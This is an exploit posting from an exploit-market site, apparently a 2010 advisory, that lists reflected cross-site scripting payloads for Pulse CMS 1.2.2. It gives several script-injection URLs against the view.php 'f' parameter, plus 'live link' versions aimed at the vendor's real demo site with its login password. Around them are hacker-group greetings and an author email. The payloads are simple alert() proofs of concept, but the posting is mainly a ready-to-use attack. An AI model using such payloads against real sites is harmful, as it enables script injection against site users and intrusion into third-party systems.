[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Pulse cms XSS Vulnerabilities

Author
Th3 RDX
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10987
Category
web applications
Date add
19-02-2010
Platform
unsorted
=============================
Pulse cms XSS Vulnerabilities
=============================

# Exploit Title: Pulse cms XSS Vulnerabilities
# Date: 19-02-2010
# Author: Th3 RDX
# Software Link: No Download Link
# Version: 1.2.2
# Tested on: Demo Site
# category: webapp
# Code :
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
                   Team I.C.W | Team W.O.I | Andhra Hackers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Gr33tz to all Indian Cyber Warriors , Wellwishers of India & Andhra Hackers
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

##############################################################################
%//

----- [ Founder ] -----

        Th3 RDX

----- [ E - mail ] -----

    th3rdx@gmail.com

    %\\
##############################################################################

##############################################################################
%//

----- [Title] -----

Pulse CMS XSS Vulnerabilities

----- [ Vendor ] -----

http://www.pulsecms.com/
                                                                           %\\
##############################################################################

##############################################################################
%//

----- [ Exploit (s) ] -----

Put <script>alert("Th3 RDX")</script>

[XSS] http://server/pulsecms/view.php?f=<script>alert("Th3 RDX")</script>

[XSS] http://server/pulsecms/view.php?f=blocks<script>alert("Th3 RDX")</script>

[XSS] http://server/pulsecms/view.php?f=blocks/About.html<script>alert("Th3
RDX")</script>

                                                                           %\\
##############################################################################

##############################################################################
%//

                  >>>>>> TESTED ON <<<<<<

----- [ Live Link (s) ] -----

Password for Login is ( demo )

[Link] http://www.pulsecms.com/demo/view.php?f=<script>alert("Th3 RDX")</script>

[Link] http://www.pulsecms.com/demo/view.php?f=blocks<script>alert("Th3
RDX")</script>

[Link] http://www.pulsecms.com/demo/view.php?f=blocks/About.html<script>alert("Th3
RDX")</script>

                                                                           %\\
##############################################################################



#  0day.today [2024-12-26]  #